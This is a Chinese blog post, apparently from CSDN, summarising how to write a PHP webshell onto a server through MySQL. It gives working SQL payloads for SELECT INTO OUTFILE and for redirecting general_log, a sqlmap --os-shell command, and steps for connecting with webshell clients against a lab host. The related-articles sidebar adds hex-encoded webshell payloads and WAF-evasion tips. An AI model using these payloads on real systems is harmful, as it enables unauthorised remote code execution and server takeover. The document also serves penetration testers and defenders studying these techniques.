mysql写入木马getshell总结

已于 2022-02-25 18:23:21 修改
阅读量5.3k 收藏 10
点赞数
分类专栏: 漏洞复现 文章标签: web安全 mysql 安全
于 2022-02-25 18:14:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65244586/article/details/123138704
版权

0x01 环境搭建

nmap查看开放端口信息

常用命令nmap -sT -Pn -sV IP地址
image-20220225012878230
查看phpinfo信息

在这里插入图片描述

mysql弱口令爆破,这里是空口令,免去爆破过程

0x02 select into outfile写入木马

sql语句

select '<?php @eval($_POST[1]);?>' into outfile 'C:/phpStudy/WWW/shell.php'

image-20220225012878232
注意这里用了 分号; 结尾

Cknife连接木马

image-20220225012878233

连接

image-20220225012878234

0x03 SQL语句利用日志写shell

outfile被禁止,或者写入文件被拦截;

在数据库中操作如下:(必须是root权限)

show variables like '%general%';  查看日志状态
SET GLOBAL general_log='on'     开启日志读写
SET GLOBAL general_log_file='C:/phpStudy/WWW/x.php';  指定需要写入日志路径
SELECT '<?php eval($_POST["cmd"]);?>'  写日志进x.php

访问 http://192.168.32.144/x.php

image-20220225012878235

使用C刀连接

image-20220225012878236

image-20220225012878237

在目标服务器上查看x.php文件

image-20220225012878238

0x04 sqlmap写入一句话getshell

使用命令–os-shell,注意需要是root权限,否则可能写入不成功

python sqlmap.py -r E:\Users\Administrator\Desktop\抓包.txt -p "id" --os-shell

image-20220225012878239

在这里插入图片描述

交互式shell不再赘述,上图已显示

访问sqlmap留的上传点 http://192.168.32.144/tmpuufgd.php

image-20220225012878241

点击upload,上传成功,访问http://192.168.32.144/ceshi.php

如图,证明已上传成功

image-20220225012878242

冰蝎连接

image-20220225012878243

明明如月001
关注
  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试-getshell方法总结
Jian Sun_的博客
02-11 3159
一、管理员权限拿shell 需要有管理员权限才可以拿shell 通常需要登录后台执行相关操作 直接上传拿shell 国内多对上传类型进行了限制,需要在进行绕过操作 1、织梦cms后台为例子 进入后台 写入一个一句话木马 长传一个一句话木马 2、数据库备份拿shell 示例:南方数据 v7.0 良精通用企业网站管理系统 方法一: 1.先上一张图马,得到路径 2.选择数据库备份,将图马备份为a.asp 3.访问xxx/xxx/.../a.asp.
一句话过WAF
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-07 1835
一.绕过方式 木马存在敏感字符被拦截 木马代码存在敏感字符,直接被waf。如:如直接传&lt;?php @@eval($_POST['123']); ?&gt;,由于存在eval危险函数直接被拦截。 这时候需要对被waf的危险字符进行各种变形即可 收集的过狗马,最大同性交友网站github也有很多webshell项目 $poc = "a#s#s#e#r#t"; $poc_1 = e......
PHP基础入门笔记
weixin_43167326的博客
01-15 361
1. 认识互联网 1.1 . 网站访问实际流程(掌握) 任何软件都有自己的对外交流入口:端口port,任何客户机访问服务器都需要指定访问端口,常用端口号需要记住: web服务器常用端口:80 Telnet远程登录端口:23 FTP服务器常用端口:21 Mysql数据库服务器常用端口3306 IP能够找到电脑,可是不好记住,所以ip设定一个别名方便用户记忆,这种别名叫做域名(Domain Name) 域名存在是为了方便用户记
mysql写入一句话木马
热门推荐
Websec
07-16 1万+
前提: root权限,知道了服务器的web的绝对路径,尝试写入一句话 mysql查询语句执行:select "&lt;?php @eval($_POST['pass']);?&gt;" INTO OUTFILE "D:\Wamp\2.php" 注意事项: 1、绝对路径的猜解 2、INTO OUTFILE 后面的"D:\Wamp\2.php",有的时候需要变成“D:\\Wamp\\2.ph...
使用蚁剑向网站上传小马
qq_67757718的博客
02-03 854
准备,被攻击的网站由PHP语言编,创建一个php文件,编辑脚本<? php @eval($_POST['123'])?> sqlmap -u"http://43.138.211.45/about.php?listid=6" --os-shell进行攻击 选择语言,攻击的网站是由PHP语言编,输入4,回车,输入y 输入2选择自定义位置,回车,输入根目录位置 查看网站的根目录是/var/www/html 回车得到 两个网址 复制第一个网址,在浏览器中打开
通过mysql写入一句话木马
aocong5568的博客
10-11 1951
USE mysql;# MySQL 返回的查询结果为空(即零行)。 # MySQL 返回的查询结果为空(即零行)。 CREATE TABLE a( cmd1 text NOT NULL );# MySQL 返回的查询结果为空(即零行)。 # MySQL 返回的查询结果为空(即零行)。 INSERT INTO a( cmd1 ) VALUES ( '<?php e...
Java实现批量向mysql写入数据的方法
08-28
此外,本文还提供了一些相关的学习资源,例如《Java+MySQL数据库程序设计总结》、《Java数据结构与算法教程》、《Java文件与目录操作技巧汇总》、《Java操作DOM节点技巧总结》和《Java缓存操作技巧汇总》,这些资源...
python执行shell获取硬件参数写入mysql的方法
09-10
在本文中,我们将深入探讨如何使用Python来执行shell命令获取硬件参数,并将这些信息写入MySQL数据库。 首先,Python提供了多种方法来执行shell命令: 1. `os.system()`:此函数用于执行shell命令,并返回一个整数...
MYSQL语句写入.zip_MYSQL语句写入
09-21
本压缩包文件“MYSQL语句写入.zip”包含了关于如何在MySQL中进行基本的写入操作的示例程序,特别是文件“MYSQL语句写入.vi”,这可能是一个Visual Interface(VI)编程环境下的代码片段,用于演示如何执行MySQL语句...
MySQL使用XtraBackup的shell脚本介绍
12-14
mysql_backup.sh是关于MySQL的一个使用XtraBackup做备份的shell脚本,实现了简单的完整备份和增量备份、以及邮件发送备份信息等功能。功能目前还比较简单,后续将继续完善和增加相关功能。参考了网上MySQL备份的脚本...
shell简单处理mysql查询结果的方法
09-09
今天小编就为大家分享一篇shell简单处理mysql查询结果的方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
mysql中getshell的方式
unexpectedthing的博客
03-17 4646
文章目录outfile和dumpfileshell利用条件基于union联合查询:非联合查询outfile和dumpfile的区别secure_file_prive日志getshell慢日志getshell利用general_logbinlog的介绍 outfile和dumpfileshell 利用条件 数据库当前用户为root权限; 知道当前网站的绝对路径; PHP的GPC为 off状态;(魔术引号,GET,POST,Cookie) 写入的那个路径存在写入权限。 基于union联合查询: ?i
MySQL解决写入权限问题
m0_62511581的博客
07-01 579
MySQL写入一句话木马解决权限问题
mysql 木马_用Mysql语句来生成后门木马方案
weixin_42509847的博客
01-25 270
下面的文章主要是介绍又如何通过MySQL(和PHP搭配之***组合) 的Mysql语句来生成后门木马的具体操作方法!以下的文章主要是通过相关代码的方式来引出Mysql语句生成后门木马的具体操作方案。SELECT*FROM`vbb_strikes`WHERE1unionselect2,3,0x3C3F7068702073797374656D28245F524551554553545B...
mysql数据库木马查杀_Linux系统木马后门查杀方法详解
weixin_30607125的博客
02-08 452
木马和后门的查杀是系统管理员一项长期需要坚持的工作,切不可掉以轻心。以下从几个方面在说明Linux系统环境安排配置防范和木马后门查杀的方法:一、Web Server(以Nginx为例)1、为防止跨站感染,将虚拟主机目录隔离(可以直接利用fpm建立多个程序池达到隔离效果)2、上传目录、include类的库文件目录要禁止代码执行(Nginx正则过滤)3、path_info漏洞修正:在nginx配置文件...
Mysql注入上传木马提权
Jim的博客
09-13 1151
上传暗月大马
<?php eval($_post[cmd])?>,<?php @eval($_POST[cmd])?>,注入风险,求帮助
weixin_42220853的博客
03-18 945
新安装的,程序没几天,发现网站有一个注册用户,他直接提升自己为实习版主了,用户组中,同时也多了一个,用如下代码,做名称的组,,同时,在服务器中,扫描,程序文件,发现,/data/log/201212_cplog.php中,也存在,于这行代码相关的记录,有很多,其中,部份如下: 1354537724 admin 1 112.81.19.226...
select into outfile导出webshell技巧
收集盒 Book box
01-14 6789
select into outfile导出webshell技巧   在网上看到的都是先建立一个表。然后插入一句话木马。再查询并导出,经过我实验 其实不用建表 就可以导出文件的   比如我们进入了phpmyadmin,随便点击一个数据库,然后点击sql,接着执行select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3
浅谈MySQL导出一句话木马WebShell的方法-只需要一句SQL
gscaiyucheng的专栏
02-28 9962
昨天看一篇文章中说到MySQL导出一句话木马WebShell的方法。   文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行):   Drop TABLE IF EXISTS temp; //如果存在temp就删掉   Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段   Insert INT
MySQL 数据库写入数据的shell 脚本
最新发布
05-24
以下是一个简单的 shell 脚本,用于向 MySQL 数据库写入数据: ```shell #!/bin/bash # 设置数据库连接参数 DB_HOST="localhost" DB_USER="root" DB_PASS="password" DB_NAME="mydatabase" # 执行 SQL 语句 mysql -h ${DB_HOST} -u ${DB_USER} -p${DB_PASS} ${DB_NAME} << EOF INSERT INTO mytable (column1, column2, column3) VALUES ('value1', 'value2', 'value3'); EOF ``` 在脚本中,我们首先设置了数据库连接参数,然后使用 `mysql` 命令执行 SQL 语句。在这个示例中,我们向名为 `mytable` 的表中插入了三个值。你可以根据自己的需求修改 SQL 语句。注意,这个脚本需要在安装了 MySQL 的系统上运行,并且需要具有适当的权限才能向数据库写入数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值